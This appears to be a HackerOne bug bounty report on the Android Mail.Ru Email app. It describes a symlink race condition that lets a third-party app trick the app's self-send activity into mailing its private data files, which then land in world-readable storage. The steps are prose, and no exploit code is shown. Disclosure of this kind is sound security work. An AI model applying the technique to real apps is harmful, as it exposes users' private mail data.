Mail.ru: Android MailRu Email: Thirdparty can access private data files with small user interaction

2017-05-04T20:35:14
ID H1:226191
Type hackerone
Reporter dzmitry
Modified 2018-01-02T18:01:25

Description

Hello, Team

Domain, site, application

Android Mail.Ru Email v. 5.5.1.21258

Testing environment

Tested on non rooted Nexus 5x Android 7.1.2,

Intro

I found that #90693 was fixed incompletely and additionaly the attack can be improved using self sending activity.

Steps

  1. Create some word readable file in "/data/data/thirdparty/file.txt"
  2. Create soft link on that file "/data/data/thirdparty/link.txt"
  3. Send this soft via Intent.EXTRA_STREAM to the Mail.Ru "ru.mail.ui.writemail.MailToMySelfActivity"
  4. After some delay, for example 1000ms, remove soft link and create new, but which will point at any file from "/data/data/ru.mail.mailapp/*". Pay attention, that MailToMySelfActivity is do sending automatically and you need find for your PoC delay which will fit in time. (Or you can use ru.mail.ui.writemail.SharingActivity)
  5. The message will be sent. If user will open that message than attachment will be downloaded automatically into the "/sdcard/Android/data/ru.mail.mailapp/...." folder.
  6. It means that any app will be able to read this attachment data which may contain private file content, for example message database.

PoC

I attach PoC source Video link (accessed only by url): https://youtu.be/tXAadbkhDCM